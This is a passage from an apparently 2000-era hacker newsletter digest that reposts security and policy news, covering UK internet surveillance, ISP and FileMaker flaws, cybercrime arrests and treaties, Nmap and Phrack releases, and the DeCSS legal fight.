and AOL, to have "hardwire" links to the new computer facility so that messages can be traced across the internet. The security service and the police will still need Home Office permission to search for e-mails and internet traffic, but they can apply for general warrants that would enable them to intercept communications for a company or an organisation. The new computer centre, codenamed GTAC - government technical assistance centre - which will be up and running by the end of the year inside MI5's London headquarters, has provoked concern among civil liberties groups. "With this facility, the government can track every website that a person visits, without a warrant, giving rise to a culture of suspicion by association," said Caspar Bowden, director of the Foundation for Information Policy Research. The government already has powers to tap phone lines linking computers, but the growth of the internet has made it impossible to read all material. By requiring service providers to install cables that will download material to MI5, the government will have the technical capability to read everything that passes over the internet. Home Office officials say the centre is needed to tackle the use of the internet and mobile phone networks by terrorists and international crime gangs.Charles Clark, the minister in charge of the spy centre project, said it would allow police to keep pace with technology. "Hardly anyone was using the internet or mobile phones 15 years ago," a Home Office source said. "Now criminals can communicate with each other by a huge array of devices and channels and can encrypt their messages, putting them beyond the reach of conventional eavesdropping." There has been an explosion in the use of the internet for crime in Britain and across the world, leading to fears in western intelligence agencies that they will soon be left behind as criminals abandon the telephone and resort to encrypted e-mails to run drug rings and illegal prostitution and immigration rackets. The new spy centre will decode messages that have been encrypted. Under new powers due to come into force this summer, police will be able to require individuals and companies to hand over computer "keys", special codes that unlock scrambled messages. There is controversy over how the costs of intercepting internet traffic should be shared between government and industry. Experts estimate that the cost to Britain's 400 service providers will be £30m in the first year. Internet companies say that this is too expensive, especially as many are making losses. About 15m people in Britain have internet access. Legal experts have warned that many are unguarded in the messages they send or the material they download, believing that they are safe from prying eyes. "The arrival of this spy centre means that Big Brother is finally here," said Norman Baker, Liberal Democrat MP for Lewes. "The balance between the state and individual privacy has swung too far in favour of the state." @HWA 132.0 [HNN] French ISP Wannado Vulnerable ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ May 1st contributed by Thiebaut French ISP Wannado has linked its web based email system to the IP address of its users allowing them to read email online without requiring a password. A simple proxy server will of course allow an intruder to masquerade his IP address and read anyones mail. There are more than 1.5 million persons that are accessing the internet with Wanadoo. This vulnerability has existed for over a month with no resolution. France Telecom, owners of Wanndo, have said the issue concerns very few users and therefore have refused to correct the problem. Le Virus Informatique http://www.acbm.com/wan.html @HWA 133.0 [HNN] Russia Arrests 55 in Credit Card Scheme ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ May 1st contributed by William Knowles Police in Moscow have arrested five people involved in an elaborate credit card scheme. The group allegedly set up a fake business with a credit card merchant account called Politshop. Then members of group raided e-commerce vendors and placed fraudulent charges onto victims cards from Politshop. ITAR-TAS reports that $630,000 was stolen but does not indicate how they where caught. Associated Press - via Tampa Bay Online http://ap.tbo.com/ap/breaking/MGII9EK5M7C.html Url kicked the bit bucket @HWA 134.0 [HNN] BTopenworld Suffers Information Leakage ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ May 1st contributed by mr.big23 BTopenworld has suffered a security leak or glitch that has published names, addresses, e-mail addresses, salary details and other personal information from consumers and business people interested in BT's ADSL products. Supposedly over three megabytes of customer data was left wide open containing the personal information of thousands of users. BTopenworld has since closed the hole and has stopped accepting additional sign ups. The Register UK http://www.theregister.co.uk/000427-000028.html Url croaked on a chicken bone @HWA 135.0 [HNN] Nmap 2.5 Released ~~~~~~~~~~~~~~~~~~~~~~~~ May 1st contributed by fyodor The popular network scanning tool Nmap has finally come out of beta and released version 2.5. It supports ping scanning , many port scanning techniques, and TCP/IP fingerprinting. Nmap also offers flexible target and port specification, decoy scanning, determination of TCP sequence predictability characteristics, sunRPC scanning, reverse-identd scanning, and more. Console and X-Window versions are available in source or binary form. (Best of all it is free.) Insecure.org http://www.insecure.org/stf/Nmap-2.50-Release.html @HWA 136.0 [HNN] Washington State Announces CLEW Agreement ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ May 1st contributed by William Knowles The Washington state Attorney General Christine Gregoire, has announced the Computer Law Enforcement of Washington agreement. The agreement will allow federal, state, and local agencies to team up to combat cyber crimes in the Pacific Northwest. Now that the agreement has been signed the group will seek $2 million from taxpayers through the U.S. Department of Justice and the Treasury to equip and expand the program. Wired http://www.wired.com/news/politics/0,1283,35970,00.html Northwest's Plans vs. Cybercrime by Manny Frishberg 3:00 a.m. Apr. 28, 2000 PDT SEATTLE -- Federal, state, and local agencies are teaming up to combat cybercrimes in the Pacific Northwest, hoping that the joint effort will prove stronger than the abilities of individual agencies, whose resources frequently are dwarfed by the magnitude of their challenges. Washington state Attorney General Christine Gregoire, who announced the program Thursday, said she hoped it would serve as a model for law enforcement agencies around the country. The CLEW agreement, or Computer Law Enforcement of Washington, was signed by the heads of the respective agencies in early March, but was not made public until Gregoire's press conference Thursday. The program will streamline efforts to combat Internet crimes, said U.S. Attorney Kate Pflaumer, adding that a lag in technological resources only adds to cooperation problems between states and countries. "The Internet does not recognize state or even national political boundaries, so cooperation between law enforcement is imperative," she said. Starting with an agreement to cooperate and share existing resources, Gregoire said the agencies will seek $2 million from the U.S. Department of Justice and the Treasury to equip and expand the program. In addition to providing computers and technicians who can tease data out of computer systems and hard drives, the program will train law enforcement personnel to seize computers and components using methods that preserve their data. Gregoire, flanked by the area's U.S. attorney, the head of the local FBI office and the Tacoma city attorney, said she's pressing Congress to pass legislation that would clarify where a crime has been committed when a Web server is in one state and the person accessing the system is in another. The group also hopes to establish uniform rules for getting search warrants for Internet-based and computer data that would be respected by all the states, so that a search warrant from Washington state could be used to seize a server in Arizona, said Pierce County Prosecuting Attorney John Landenburg. With the Anarchist Cookbook home page projected onto a screen behind her, Gregoire launched into a set of statistics to illustrate the scale of the problem. Eighty-five percent of all Internet bulletin board traffic is dedicated to hacking, software piracy, or sex, Gregoire said, citing a New York Times article. In a recent FBI study of Fortune 500 companies, reported losses from computer crime between 1997 and 1999 exceeded $360 million, and 62 percent of those companies reported a computer security breach within the last year, she added. Landenburg, who's assembled a computer forensics lab for his area, said he was concerned that 37 out of 38 jurisdictions in the state don't have the resources to follow Tacoma's lead. Landenburg said he still has problems keeping up with the pace of change in the computer industry. "Every year we have to go out and replace our equipment" to match that of the people the lab is investigating, he said. In another component to the program, the University of Washington will help out with a new Web-based center to handle consumer complaints and mediate e-commerce disputes, Gregoire said. @HWA 137.0 [HNN] New York Times Links to DeCSS ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ May 1st contributed by Macki The New York Times has linked directly to the 2600 list of sites which currently house the DeCSS code. This action is similar to that for which the MPAA is currently suing several webs sites. 2600 New York Times http://www.2600.com/news/2000/0428.html http://www10.nytimes.com/library/tech/00/04/cyber/cyberlaw/28law.html @HWA 138.0 [HNN] More E-zines ~~~~~~~~~~~~~~~~~~ May 1st contributed by xellent55 and k-rad-bob b0g has released its fourth issue. SWAT Magazine, the UK's longest running underground magazine, has released issue 28. b0g Swat Team http://www.b0g.org http://www.swateam.org 139.0 [HNN] mStream Joins Trinoo, TFN and Stacheldraht ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ May 2nd contributed by William Knowles A new tool has joined the ranks of the old standbys in distributed DoS attacks. Now not only is their Trinoo, TFN and Stacheldraht tools there is mStream. mStream was recently discovered on a compromised Linux system in the wild. Initial analysis shows the program to be in the early stages of development however it has the potential to be much more powerful than existing tools. C|Net Security Focus - Source code analysis of mStream http://news.cnet.com/news/0-1003-200-1798064.html?tag http://www.securityfocus.com/templates/archive.pike?list @HWA 140.0 [HNN] Phrack 56 Released ~~~~~~~~~~~~~~~~~~~~~~~~ May 2nd contributed by wizdumb One of the oldest and most respected underground e-zines has released its 56th issue. Phrack 56 has articles on Bypassing StackGuard and StackShield, Smashing C++ VPTRs, Anomaly Detection Model for IDS and much much more with all you old favorite columns like Loopback and Line Noise. (OK, who remembers what line noise rea*ly %ad*&% >< {|]!~ ~!!) Phrack http://www.phrack.com/ @HWA 141.0 [HNN] Tech Crimes Get Double Sentences ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ May 2nd contributed by acopalyse The U.S. Sentencing Commission has sent guidelines to Congress that would substantially increase penalties for such crimes as credit card and identity theft, using computers to solicit or sexually exploit minors and violating copyrights or trademarks online. The new guidelines would effectively double many of the existing penalties. The guidelines are slated to take effect November 1, 2000. MSNBC http://www.msnbc.com/news/401964.asp Dead url @HWA 142.0 [HNN] Numbers Numbers Who has the Numbers ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ May 2nd contributed by root66 So how many attempted cyber attacks do DOD computers fend off each year? Depends on who you listen to and what you call an attack I guess. It would appear that some officials don't know the difference between a network query and an attempted intrusion. It would seem from the numbers that attacks (network queries, intrusions, ???) against DOD ranged somewhere between 58 and 250,000 for 1999. Federal Computer Week http://www.fcw.com/fcw/articles/2000/0501/intercepts-05-01-00.asp Intercepts BY Dan Verton 05/01/2000 The Hacker Equation My mobile listening posts have discerned a confusing pattern of reports on the number of hacker "attacks" launched against the Defense Department each year. It started out simple enough: Early last year, Air Force Maj. Gen. John "Soup" Campbell, commander of the Joint Task Force for Computer Network Defense, placed the number of "attacks" against DOD networks at 250,000 each year. But in November 1999, Lt. Gen. David Kelley, director of the Defense Information Systems Agency, talked about a 300 percent increase in the number of "unauthorized intrusions." Intrusions skyrocketed, according to Kelley, from 5,844 in 1998 to 18,433 through November 1999. (Campbell reported last week that this number topped off at 22,144 for all of 1999.) This year the numbers got more complicated. In March, Lt. Col. LeRoy Lundgren, program manager for the Army’s National Security Improvement Program, said the Army alone denied as many as 285,000 network queries last year because of questionable methods used in the queries. The Interceptor guesses "network queries" are somehow similar to "attacks." Enter the Justice Department. According to Justice, the number of hacking cases throughout the government nearly doubled last year, reaching 1,154, up from 547 in 1998. One look at these numbers and you have to wonder if these guys even know that DOD is part of the federal government. Then, of course, there are "incidents" and "intrusions" to deal with. Lt. Gen. William Campbell, the Army’s chief information officer, last week told a crowd at the Association of the U.S. Army’s annual symposium on information assurance and battlefield visualization that the Army experienced 3,077 "incidents" during fiscal 1999 and 58 "intrusions." For fiscal 2000, those numbers had reached 2,230 and 40, respectively, by April 4. But "Soup" Campbell told the same crowd that in fiscal 1998 a total of 5,844 incidents were reported to the Pentagon by DOD commands. In fiscal 1999, that number reached 22,144, and during the first three months of this year, that number had already surpassed 5,993, Campbell said. Confused? I am. Serving Campbell Soup at the CIA "Soup" Campbell told the Interceptor last week that he’s received orders to report in June to CIA headquarters, where he will take over as the director of military support. Speaking at the AUSA symposium, Campbell also said the JTF-CND recently added legal counsel to its official structure. "I never thought I’d need a lawyer to do my business," Campbell said, referring to the lack of legal guidelines governing computer network attack and defense. Hey, don’t knock it, Soup. Legal counsel is highly underrated in this world of error-prone databases and outdated hard-copy maps. Fortunately, I hear that there’s no shortage of lawyers in Langley, Va. Go West, Young Man My E-Ring listening post in the heart of the Pentagon has picked up several low-level signals indicating that Paul Brubaker, the Defense Department’s acting deputy chief information officer, plans to leave his position in a matter of weeks. A strong supporter of the Navy/Marine Corps Intranet proposal, Brubaker has apparently succumbed to "dot-com fever," according to sources, and will be zapping himself out to the West Coast after he checks out of DOD. One N/MCI insider said he hoped the move "is not a harbinger of the future" for the beleaguered program. Intercept something? Send it to the Interceptor at antenna@fcw.com. @HWA 143.0 [HNN] Password Thief in Hong Kong Behind Bars ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ May 2nd contributed by Evil Wench Cheng Tsz-chung, 22 was behind bars last night after changing the password on another users account and then demanding HK$500 to change it back. The victim paid the money and then contacted police. It is unknown how Police tracked down Mr. Cheng. He has pleaded guilty to one charge of unauthorized access to a computer and two counts of theft. The magistrate remanded Cheng in custody and said his sentence, which will be handed down on May 10 pending reports, must have a deterrent effect. Cheng's lawyer told the Magistrate that his client committed the offenses "just for fun". (The just for fun defense? That's a new one.) South China Morning Post http://www.technologypost.com/internet/DAILY/20000427134721295.asp?Section Published on Thursday, April 27, 2000 INTERNET Hacker demanded HK$500 for chatroom password ELAINE PAK LI -------------------------------------------------------------------------- ------ A computer hacker was behind bars last night after breaking into a man's on-line chatroom account, changing his password and demanding HK$500 to change it back. When Lee Kei, 21, found that his account's password had been changed by computer technician Cheng Tsz-chung in July last year, he opened another account to enter the chatroom and discuss the matter with the hacker, Eastern Court heard. During their on-line exchanges, Cheng, 22, tested Mr Lee's computer knowledge by asking him several complicated questions, none of which Mr Lee could answer, the court heard. Cheng then refused to release Mr Lee's account, instead offering to sell it back to him. The victim deposited $500 into Cheng's bank account the next day and reported the matter to police. Cheng was arrested in March when he was coincidently stopped and searched by a police officer in Tsim Sha Tsui, the court heard. He pleaded guilty to one charge of unauthorised access to a computer and two counts of theft. Cheng's lawyer told Magistrate Ian Candy that his client, who had no previous criminal record, committed the offences "just for fun". Mr Candy said: "Not only did you break into another person's account and use it yourself, you even asked for money when you were discovered." The magistrate remanded Cheng in custody and said his sentence, which will be handed down on May 10 pending reports, must have a deterrent effect. @HWA 144.0 [HNN] FMA and SM Release CD ~~~~~~~~~~~~~~~~~~~~~~~~~~~ May 2nd contributed by Nick Freaks Macintosh Archives and Secure Mac have teamed up to create the most up to date CD filled with Macintosh security and hacking related tools in existence. The CD combines the old Whacked Mac Archives with the new archives of Securemac.com and freaky.staticusers.net. All for only $20. Secure Mac Freaks Macintosh Archives http://www.securemac.com/securemacfma.html http://freaky.staticusers.net/ @HWA 145.0 [HNN] Metallica Claims It has 300,000 Individual Names of Napster Users ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ May 3rd contributed by Rapier311 Metallica claims that it has discovered the names of 335,435 individuals who have used Napster to trade their songs. The band hired 'NetPD' to do the research over the weekend to come up with the names. Metallica plans to offer the names to Napster first before adding them into the lawsuit. (Be interesting to know how NetPD came up with that list and how accurate it is.) C|Net http://technews.netscape.com/news/0-1005-200-1798138.html?tag @HWA 146.0 [HNN] President Sets GPS to Full Force ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ May 3rd contributed by Maggie The Global Positioning System has been purposely crippled for civilian use since its inception. Now president Clinton has decided that civilians should get the same use of GPS as the military by disabling the degradation of the signal or Selective Availability. Degradation of the civilian signal was originally to prevent foreign nations from having the same advantage as us but the US has demonstrated the capability to selectively deny GPS signals on a regional basis during times of conflict so the Selective Availability is no longer necessary. The removal of Selective Availability will increase Civilian GPS accuracy from 100 to 10 or 20 meters. (Wow, this should mean some real cool GPS products should hit the market soon.) the White House Federal Computer Week http://www.whitehouse.gov/library/PressReleases.cgi?date http://www.fcw.com/fcw/articles/2000/0501/web-gps-05-02-00.asp June 18, 2000 STATEMENT BY THE PRESIDENT Forwarded by Megan C. Moloney/WHO/EOP on 06/18/2000 09:07 AM Megan C. Moloney 06/18/2000 09:07:12 AM Record Type: Record To: cc: Subject: Statement by the President: Ethiopia and Eritrea THE WHITE HOUSE Office of the Press Secretary For Immediate Release June 18, 2000 STATEMENT BY THE PRESIDENT Today in Algiers, Ethiopia and Eritrea signed an agreement to cease hostilities. This is a breakthrough which can, and should end the tragic conflict in the Horn of Africa. It can, and should permit these two countries to realize their potential in peace, instead of squandering it in war. I commend the Organization of African Unity, and especially its chair Algerian President Abdelaziz Bouteflika, for leading the negotiation of this agreement. I am grateful to my envoy, former National Security Advisor Anthony Lake, to Assistant Secretary of State Susan Rice and to my senior advisor on African Affairs Gayle Smith for their tireless pursuit of a peaceful resolution to this conflict. The United States has supported the OAU in this effort and we will continue to do so. I have asked Tony Lake to return to Algiers to work with the OAU as we enter the next round of negotiations. I hope this commitment by Ethiopia and Eritrea to stop the fighting also signals their commitment to build the peace. I urge them to use the next round of talks to produce a final, comprehensive, lasting agreement, so they can get on with the work of pursuing democracy and development for their people. Ethiopia and Eritrea are America?s friends. If they are ready to take the next step, we and our partners in the international community will walk with them. # # # Civil GPS accuracy boosted BY Paula Shaki Trimble What is GPS? GPS is a system of at least 24 orbiting satellites operated by the Defense Department that provides accurate positioning and timing information to users on the ground, in the air or in space. GPS is used to guide missiles, navigate civilian aircraft and time cellular communications handoffs from one base station to another. 05/02/2000 President Clinton on Monday delivered on a 4-year-old promise to improve the accuracy of the Global Positioning System to civil users. In a presidential directive in 1996, Clinton promised to revisit the issue of intentionally degrading the civil GPS signal in 2000. He had promised to discontinue use of the degradation capability — known as selective availability — by 2006, with an annual assessment of its continued use beginning this year. Selective availability was deactivated at midnight on Monday, the president’s science adviser, Neal Lane, announced during a press briefing earlier in the day. The decision came early because the Defense Department has sufficiently proven its ability to deny the GPS signal to adversaries in a specific region while maintaining availability to users elsewhere, said Arthur Money, the Pentagon’s assistant secretary of Defense for command, control, communications and intelligence. Selective availability caused the civil GPS signal to be accurate within 100 meters. Without selective availability, users will receive position information accurate within 10 to 20 meters. While the modification significantly improves the accuracy of the GPS signal, the Transportation Department is still committed to developing systems that augment the GPS capability, said Eugene Conti, assistant secretary of Transportation for transportation policy. Those systems, such as the Federal Aviation Administration’s Wide-Area Augmentation System and Local-Area Augmentation System and the Coast Guard’s National Differential GPS System, verify that the GPS signal is reliable. @HWA 147.0 [HNN] New Cyber Crime Treaty Making the Rounds ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ May 3rd contributed by Evil Wench The 'Draft Convention on Cybercrime', written in part by US law enforcement is currently circulating among 40 countries for approval. If enacted the proposal would make software designed or adapted to gain access to a computer system without permission illegal, interference with the 'functioning of a computer system' by deleting or altering data, force people to give up their encryption keys, and require ISPs to collect info about their users. Wired Draft Convention on Cybercrime http://www.wired.com/news/politics/0,1283,36047,00.html http://www.politechbot.com/docs/treaty.html Cybercrime Solution Has Bugs by Declan McCullagh 3:00 a.m. May. 3, 2000 PDT WASHINGTON -- U.S. and European police agencies will receive new powers to investigate and prosecute computer crimes, according to a preliminary draft of a treaty being circulated among over 40 nations. The Council of Europe's 65KB proposal is designed to aid police in investigations of online miscreants in cases where attacks or intrusions cross national borders. But the details of the "Draft Convention on Cybercrime" worry U.S. civil libertarians. They warn that the plan would violate longstanding privacy rights and grant the government far too much power. The proposal, which is expected to be finalized by December 2000 and appears to be the first computer crime treaty, would: Make it a crime to create, download, or post on a website any computer program that is "designed or adapted" primarily to gain access to a computer system without permission. Also banned is software designed to interfere with the "functioning of a computer system" by deleting or altering data. Allow authorities to order someone to reveal his or her passphrase for an encryption key. According to a recent survey, only Singapore and Malaysia have enacted such a requirement into law, and experts say that in the United States it could run afoul of constitutional protections against self-incrimination. Internationalize a U.S. law that makes it a crime to possess even digital images that "appear" to represent children's genitals or children engaged in sexual conduct. Linking to such a site also would be a crime. Require websites and Internet providers to collect information about their users, a rule that would potentially limit anonymous remailers. U.S. law enforcement officials helped to write the document, which was released for public comment last Thursday, and the Justice Department is expected to urge the Senate to approve it next year. Other non-European countries actively involved in negotiations include Canada, Japan, and South Africa. During recent testimony before Congress, Attorney General Janet Reno warned of international computer crime, a claim that gained more credibility last month with the arrest of alleged denial-of-service culprit Mafiaboy in Canada. "The damage that can be done by somebody sitting halfway around the world is immense. We have got to be able to trace them, and we have made real progress with our discussions with our colleagues in the G-8 and in the Council of Europe," Reno told a Senate appropriations subcommittee in February, the week after the denial-of-service attacks took place. "Some countries have weak laws, or no laws, against computer crimes, creating a major obstacle to solving and to prosecuting computer crimes. I am quite concerned that one or more nations will become 'safe havens' for cyber-criminals," Reno said. Civil libertarians say the Justice Department will try to pressure the Senate to approve the treaty even if it violates Americans' privacy rights. "The Council of Europe in this case has just been taken over by the U.S. Justice Department and is only considering law enforcement demands," says Dave Banisar, co-author of The Electronic Privacy Papers. "They're using one more international organization to launder U.S. policy." Banisar says Article 6 of the measure, titled "Illegal Devices," could ban commonplace network security tools like crack and nmap, which is included with Linux as a standard utility. "Companies would be able to criminalize people who reveal security holes about their products," Banisar said. "I think it's dangerous for the Internet," says Barry Steinhardt, associate director of the American Civil Liberties Union and a founder of the Global Internet Liberty Campaign. "I think it will interfere with the ability to speak anonymously." "It will interfere with the ability of hackers -- using that term in a favorable light -- to test their own security and the security of others," Steinhardt said. Solveig Singleton, director of information studies at the libertarian Cato Institute says it's likely -- although because of the vague language not certain -- that anonymous remailers will be imperiled. The draft document says countries must pass laws to "ensure the expeditious preservation of that traffic data, regardless whether one or more service providers were involved in the transmission of that communication." A service provider is defined as any entity that sends or receives electronic communications. Representing the U.S. in the drafting process is the Justice Department's Computer Crime and Intellectual Property section, which chairs the G-8 subgroup on high-tech crime and also is involved with a cybercrime project at the Organization of American States. In December 1997 Reno convened the first meeting on computer crime of the G-8 nations. A recent White House working group, which includes representatives from the Justice Department, FBI, and Secret Service has called for restrictions on anonymity online, saying it can provide criminals with an impenetrable shield. So has a report from a committee of the European Parliament. Other portions of the treaty include fairly detailed descriptions of extradition procedures and requirements for countries to establish around-the-clock computer-crime centers that police groups in other countries may contact for immediate help. The Council of Europe is not affiliated with the European Union, and includes over 40 member nations, including Russia, which joined in 1996. After the Council of Europe's expert group finalizes the proposed treaty, the full committee of ministers must adopt the text. Then it will be sent to countries for their signatures. Comments can be sent to daj@coe.int. @HWA 148.0 [HNN] Vulnerabilities Found in FileMaker ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ May 3rd contributed by acopalyse FileMaker Pro 5 database package has security flaws in the Web Companion software. This flaw allows Internet users to view the contents of online Web Companion databases and access the plug-in's e-mail functions without authorization. A third flaw allows unauthorized users to send anonymous or impersonated e-mail. FileMaker says that no customers have yet complained about this problem. MacWeek http://macweek.zdnet.com/2000/04/30/0501fmresponds.html Monday, May 1, 2000 FileMaker admits security flaws FileMaker on Monday issued a statement confirming security flaws in the Web Companion software that's part of the company's FileMaker Pro 5 database package. The flaws, first reported by software developer Blue World Communications, make it possible for Internet users to view the contents of online Web Companion databases and access the plug-in's e-mail functions without authorization. A third flaw allows unauthorized users to send anonymous or impersonated e-mail. Web Companion is a plug-in that allows users to post FileMaker databases on the Web. "At this point, we know of no customers who have experienced problems due to these issues, and these issues only concern users publishing FileMaker databases via our Web Companion," FileMaker public relations manager Kevin Mallon said in the statement. "But because the security of our customers' data is and always has been an overriding priority at FileMaker, we are committed to sharing what we know quickly and accurately. "More importantly, we intend to fully investigate and address any bugs as quickly as possible. Resolving these issues is a top priority for FileMaker." Mallon wrote that "some technologies in the Web Companion may inappropriately expose field contents which the user thinks are protected by Field-Level Security. FileMaker intends to address this problem as soon as possible." Until FileMaker issues a fix, he said that users be aware that Field-Level Security may not be reliable, and suggested alternative security schemes, such as password protection in FileMaker or Function-Level Security in the Web Security Database. Mallon advised Web administrators concerned about the e-mail flaw to activate Web Companion's Logging feature--accessed through Preferences--to track requests sent to the plug-in. "This is a good general practice in any case," he wrote. Blue World said that customers can set up the company's Lasso Web Data Engine as a secure proxy for Web Companion databases, allowing use of Lasso's security features to restrict access. Other alternatives include disabling Web Companion or using an earlier version of FileMaker. @HWA 149.0 [HNN] Internet Threat gets Four Months ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ May 3rd contributed by Code Kid A 18 year old student has been sentenced to four months in jail for issuing a threat over the Internet. Michael Ian Campbell had pleaded guilty last February to 'transmitting a threat of violence' against Columbine High School via an Internet chat room. is lawyer attempted a novel defense based on 'Internet intoxication.' (Yes, Columbine was a tragedy but if this threat had been made face to face I'd bet no one would have even taken it seriously let alone arrest the guy and give him four months.) Newsbytes - via Computer User http://www.currents.net/news/00/05/02/news2.html Daily News Teen Sentenced in Columbine Web Threat By Martin Stone, Newsbytes May 02, 2000 A judge in Denver has reportedly handed down a four-month prison sentence to an 18-year-old Florida man convicted of sending a chat-room message threatening violence at Columbine High School, scene of a shooting spree last year which claimed 15 lives. A Reuters report Monday said the teen, Michael Ian Campbell, collapsed in the courtroom after being handed the sentence. Campbell pleaded guilty in February to "transmitting a threat of violence" across state lines. His lawyer attempted a novel defense based on "Internet intoxication." The report said a Columbine student, 16-year-old Erin Walton, was in a chat room on Dec. 15 when Campbell told her to stay away from school the next day because he planned to "finish what begun," which authorities argued made a clear reference to the massacre and led school officials to cancel classes for two days. Campbell is reported to be suffering from depression and had attempted suicide following his arrest at his Florida home after officials at America Online helped police trace the origin of the message. He has since apologized for the episode, and prosecutors had recommended a light sentence. But, the judge maintained that though he could have given Campbell probation or a sentence of up to six months, he felt the four-month sentence would serve as a deterrent to others, the report said. Reported By Newsbytes.com, http://www.newsbytes.com . @HWA 150.0 [HNN] Dissemination of Pager Traffic Not Needed For Violation of Law ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ May 3rd contributed by root66 Kevin Sills, a police officer in New York City, was charged that between 1996 and 1998, Mr. Sills possessed software that was programmed to intercept alphanumeric pager messages -- a violation of §2512(1)(b) of the Electronics Communications Privacy Act. It also charged Mr. Sills with violating §2511(1)(a) of the act by intercepting such messages. Mr. Sills claimed that since there was dissemination of the interception, either for profit or other reasons, that the law should not apply. Senior Judge Shirley Wohl Kram disagreed and has refused to dismiss the case. The National Law Journal http://www.nylj.com/stories/00/05/050200a1.htm Pager Eavesdropping Trial OK'd BY MARK HAMBLETT New York Law Journal Tuesday, May 2, 2000 A CHALLENGE to a federal prosecution under the Electronics Communications Privacy Act involving eavesdropping of alphanumeric pagers has been rejected by a Southern District judge. Senior Judge Shirley Wohl Kram refused to dismiss a case against a New York City police officer who allegedly used software to read paging messages by the police department. Judge Kram rejected arguments by the officer that reading the pages is not forbidden under the act, and that he was the victim of selective prosecution in the case, United States v. Sills, 99 Cr. 1133. Kevin Sills, a police officer for the city since 1996, was the subject of a sting operation in 1998 by a criminal investigator working for the U.S. Attorney's Office. The two-count indictment charged that between 1996 and 1998, Mr. Sills possessed software that was programmed to intercept alphanumeric pager messages — a violation of §2512(1)(b) of the act. It also charged Mr. Sills with violating §2511(1)(a) of the act by intercepting such messages. The software, called "Message Tracker," is manufactured by a Texas company called K & L Technology. When used in conjunction with a radio scanner, Message Tracker can be used to intercept messages from the targeted pager and display them on a computer. In phone conversations with an employee of K & L Technology who was cooperating with the investigator, Mr. Sills allegedly said that he had been reading other pagers, asked the employee if the company would modify his scanner so it worked in conjunction with a more advanced version of Message Tracker and then ordered the modifications to be done. Investigator Ronald G. Gardella, posing as a Federal Express delivery man, then delivered to Mr. Sills' home his newly modified scanner and the latest version of Message Tracker software. An ensuing search of the premises allegedly turned up a computer file containing "Capcodes," which, along with specific radio frequency, make up the electronic address for pagers and distinguishes them from other pagers. Prosecutors charged that one of the Capcodes in that file belonged to the pager used by the body guard and driver for Police Commissioner Howard Safir. Mr. Sills moved to dismiss the charges before Judge Kram. First, he said his conduct was exempt under §2511(g) of the act, which excludes any radio communication transmitted by any governmental, law enforcement or public communications system "readily accessible to the general public." Quoting the statute, Judge Kram said the act defines "readily accessible" as radio communications that are not "transmitted over a communication system provided by a common carrier, unless the communication is a tone only paging system communication." Not 'Tone Only' She said it was "undisputed" that the communications being intercepted by Mr. Sills were not "tone only" transmissions, and therefore, the transmissions at issue were not "readily accessible to the general public." Mr. Sills argued that he was singled out because he was a police officer and said that "this case appears to be the first prosecution, in this district or anywhere, involving alphanumeric pager interceptions when there is no dissemination of the intercepted information." He said the equipment he used was advertised on the open market and the government has never chosen to prosecute news organizations and private individuals who "knowingly pay for intercepted police pager communications." Mr. Sills said that when the government prosecuted the Breaking News Network for profiting from the dissemination of intercepted pager information, including police messages, the government did not prosecute people or news organizations who paid for BNN's service. Judge Kram disagreed. "Whereas BNN's customers obtained pager messages through a purported 'service provider,' Sills directly intercepted them," she said. Assistant U.S. Attorney David Raskin represented the government. Bradley D. Simon represented Mr. Sills. @HWA 151.0 [HNN] 2600 Secures Big Time Lawyer ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ May 4th contributed by jandrews Emmanuel Goldstein has retained the services of New York lawyer Martin Garbus in his case against the MPAA regarding his posting of DeCSS to his web site. Garbus has defend such luminaries as Lenny Bruce, Timothy Leary, and George Wallace. He has won all 20 of his arguments before the Supreme Court. Garbus plans to argue that DeCSS is an innovation in interoperability, and therefore protect under the "fair use" principle of the First Amendment. "There is little question in my mind this persecution of hackers is, in many respect, analogous to the Communist red-baiting of yore. They are being unfairly maligned, and stigmatized, without due cause." - Martin Garbus Village Voice http://www.villagevoice.com/issues/0018/howe.shtml DOWN BY LAW BY JEFF HOWE When Movie Moguls Wage War to Protect Copyright, the First Amendment Ends Up on the Cutting Room Floor n the world of Martin Garbus, we are all teachers and he is the student. This at least partly explains why an otherwise innocent DVD player lies in pieces on the coffee table in his Madison Avenue law office. The teacher today is Chris DiBona, prominent evangelist of the open-source creed—the belief that computer code, like speech, wants to be free. DiBona is teaching Garbus, who only recently learned how to work his own e-mail, why a miniscule bit of silicon in this player—and an equally miniscule program built to bypass it—have sparked a federal case that will determine whether we pass through the digital age with the First Amendment intact. As DiBona speaks, pointing at various organs in the innards of the DVD player, Garbus leans forward and listens intently. Very intently. You can almost hear the sound of files shifting and expanding inside Garbus's cerebrum. The force of this man's concentration could bend spoons, or laws. "I chose this life so I could forever remain a student," Garbus says, in a not-infrequent display of mock humility. This life, as it happens, has also allowed Garbus to remain a high-profile rebel. Perhaps the closest thing in New York to a modern-day Daniel Webster, Garbus has made a living by fighting the dark side in all its forms. A laundry list of Garbus's clients reveals a Zelig-esque talent for being on the right side of the right fight at the right time. Garbus fought for Lenny Bruce in '64, for Timothy Leary in '66, and against Alabama governor George Wallace in '68. A few years later he hid the Pentagon Papers in his attic for reporter Daniel Ellsberg. He has argued before the Supreme Court on 20 occasions, winning each time. Garbus has fought to protect the copyright of work by Samuel Beckett, Robert Redford, Al 